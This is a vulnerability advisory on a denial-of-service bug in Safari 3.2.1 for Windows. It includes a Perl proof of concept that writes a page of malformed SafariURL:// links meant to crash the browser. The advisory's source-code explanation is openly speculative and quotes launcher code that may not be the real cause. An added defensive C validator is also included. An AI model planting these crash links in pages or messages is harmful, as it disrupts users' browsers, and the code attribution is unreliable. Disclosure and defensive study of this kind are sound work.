Safari 3.2.1 for Windows SafariURL protocol handler abuse (NULL dereference)
Vendor: http://www.apple.com
Original advisory: http://lostmon.blogspot.com/2009/01/safari-321-for-windows-safariurl.html
Vendor notified: YES    Exploit available: Private
##############################################
This article is the second part of:
http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html
Safari for Windows is prone to a NULL pointer dereference in its http, ftp and
SafariURL protocol handlers.
The issue is triggered when a user clicks a specially crafted link whose
malformed URI causes the NULL pointer dereference in Safari; the result is a
loss of availability of the browser.
The SafariURL case is curious: if we compose a malformed URL such as
SafariURL://http://../ or SafariURL://ftp://../ and try to open it with Safari,
Safari opens a new window. When we try to close this new window by clicking
its 'X', the window closes but immediately reopens...
So why does it reopen, in an infinite loop?
Take a look at the possible source code of the function: nowhere in the code
does it check, before using the pointer, that the pointer is not NULL. Only the
status code returned by the lookup is tested.
######################
Part of code affected
######################
// Objective-C, from the WebKit nightly launcher as quoted in the advisory.
// Only the body was quoted; the function header is not part of the advisory.
    CFURLRef safariURL = nil;
    OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator,
                                            CFSTR("com.apple.Safari"),
                                            nil, nil, &safariURL);
    // Only the status code is tested; safariURL itself is never checked
    // for NULL before it is used below.
    if (err != noErr)
        displayErrorAndQuit(@"Unable to locate Safari",
                            @"Nightly builds of WebKit require Safari to run. Please check that it is available and then try again.");
    NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL path]];
    CFRelease(safariURL);   // CFRelease() must not be passed NULL
    return safariBundle;
}
###############################
Simple PoC
################################################
#!/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [[email protected] ]
# [http://lostmon.blogspot.com]
#
# Writes an HTML page containing the malformed SafariURL:// links. Open the
# page in Safari 3.2.1 for Windows and click one of the links to trigger the DoS.
use strict;
use warnings;

my $archivo = $ARGV[0];
if (!defined($archivo)) {
    print "Usage: $0 <file.html>\n";
    exit 1;
}

my $cabecera = "<html><title>Safari 3.2.1 for windows Browser Die PoC By Lostmon</title>\n<body>\n";

# The href values are the malformed URIs themselves: a SafariURL: scheme
# wrapping an http: or ftp: URL whose host is "." or "..".
my $codigo = <<'HTML';
<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>( [email protected]) http://lostmon.blogspot.com</h3>
<p>This PoC is a malformed http, safariurl and ftp URI; it causes Safari for Windows<br>
to become unstable and unresponsive.<br>
Click THIS link =></p><a href="SafariURL://http://../">Safari Die()</a> or
this other =><a href="SafariURL://http://./">Safari Die()</a>
<br>
=></p><a href="SafariURL://ftp://../">Safari Die()</a> or this other =><a href="SafariURL://ftp://./">Safari Die()</a>
HTML

my $piepag = "</body></html>\n";
my $datos  = $cabecera . $codigo . $piepag;

open(my $fh, '>', $archivo) or die "Cannot write $archivo: $!\n";
print $fh $datos;
close($fh);
exit 0;
############################################
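The inputs the PoC feeds to the handler are nested URLs whose host part is "." or "..". As an added example (not code from the advisory, from Apple or from WebKit), here is the kind of argument validation in C that a SafariURL: handler could apply before acting on what it receives: it strips the SafariURL:// prefix, requires the nested scheme to be http or ftp (the two the advisory exercises) and requires a host made of non-empty letter/digit/hyphen labels, so the PoC inputs are refused up front. The function and type names, the accepted scheme list and the hostname rule are all assumptions for illustration; the sample inputs are constructed from the PoC.

```c
/* Added example: validating a SafariURL:-style handler argument.
 * Not Apple's or WebKit's code; names and rules are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum safariurl_status {
    SAFARIURL_OK = 0,
    SAFARIURL_BAD_PREFIX,   /* argument does not start with SafariURL:// */
    SAFARIURL_BAD_SCHEME,   /* nested scheme is not http or ftp */
    SAFARIURL_BAD_HOST      /* empty host, or a label that is not a hostname label */
};

struct safariurl_arg {
    char scheme[8];         /* lower-cased nested scheme */
    char host[256];         /* nested host, copied out */
    const char *path;       /* points into the input at the first '/', or "" */
};

/* Case-insensitive prefix match; returns the prefix length on match, 0 otherwise. */
static size_t match_prefix_ci(const char *s, const char *prefix) {
    size_t n = strlen(prefix);
    for (size_t i = 0; i < n; i++) {
        if (s[i] == '\0' ||
            tolower((unsigned char)s[i]) != tolower((unsigned char)prefix[i]))
            return 0;
    }
    return n;
}

/* A hostname label is 1..63 chars of [A-Za-z0-9-], not starting or ending with '-'.
 * This deliberately rejects "." and "..", the hosts used by the PoC. */
static int valid_label(const char *label, size_t len) {
    if (len == 0 || len > 63) return 0;
    if (label[0] == '-' || label[len - 1] == '-') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)label[i];
        if (!isalnum(c) && c != '-') return 0;
    }
    return 1;
}

static int valid_host(const char *host) {
    if (*host == '\0') return 0;
    const char *p = host;
    for (;;) {
        const char *dot = strchr(p, '.');
        size_t len = dot ? (size_t)(dot - p) : strlen(p);
        if (!valid_label(p, len)) return 0;
        if (!dot) return 1;
        p = dot + 1;
    }
}

enum safariurl_status parse_safariurl(const char *arg, struct safariurl_arg *out) {
    memset(out, 0, sizeof *out);
    out->path = "";

    size_t n = match_prefix_ci(arg, "SafariURL://");
    if (n == 0) return SAFARIURL_BAD_PREFIX;
    const char *nested = arg + n;

    /* Nested scheme: everything before "://", lower-cased, must be http or ftp. */
    const char *sep = strstr(nested, "://");
    if (!sep || (size_t)(sep - nested) >= sizeof out->scheme) return SAFARIURL_BAD_SCHEME;
    size_t slen = (size_t)(sep - nested);
    for (size_t i = 0; i < slen; i++)
        out->scheme[i] = (char)tolower((unsigned char)nested[i]);
    out->scheme[slen] = '\0';
    if (strcmp(out->scheme, "http") != 0 && strcmp(out->scheme, "ftp") != 0)
        return SAFARIURL_BAD_SCHEME;

    /* Host: from after "://" up to the next '/' or the end of the string. */
    const char *hstart = sep + 3;
    const char *hend = strchr(hstart, '/');
    size_t hlen = hend ? (size_t)(hend - hstart) : strlen(hstart);
    if (hlen == 0 || hlen >= sizeof out->host) return SAFARIURL_BAD_HOST;
    memcpy(out->host, hstart, hlen);
    out->host[hlen] = '\0';
    if (!valid_host(out->host)) return SAFARIURL_BAD_HOST;

    out->path = hend ? hend : "";
    return SAFARIURL_OK;
}

int main(void) {
    /* Constructed samples: the three PoC links plus one well-formed argument. */
    const char *samples[] = {
        "SafariURL://http://../", "SafariURL://http://./",
        "SafariURL://ftp://../",  "SafariURL://http://example.com/path"
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct safariurl_arg a;
        enum safariurl_status st = parse_safariurl(samples[i], &a);
        printf("%-40s -> %s\n", samples[i], st == SAFARIURL_OK ? "accepted" : "rejected");
    }
    return 0;
}
```

This is an input-filtering layer in front of the handler, not a replacement for the missing NULL check the advisory points at: a handler that validates its argument but still dereferences an unchecked pointer remains crashable. The label rule is intentionally strict and would also refuse IP literals and non-ASCII hostnames; a real handler would extend it to whatever it genuinely needs to accept.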
I don't know if it has remote code execution or anything else;
I ran SEVERAL tests and could only cause a DoS.
I don't know if we can change the NSBundle...
Thanks to Estrella for being my light.
Thanks to all the Lostmon Team.
--
Sincerely:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....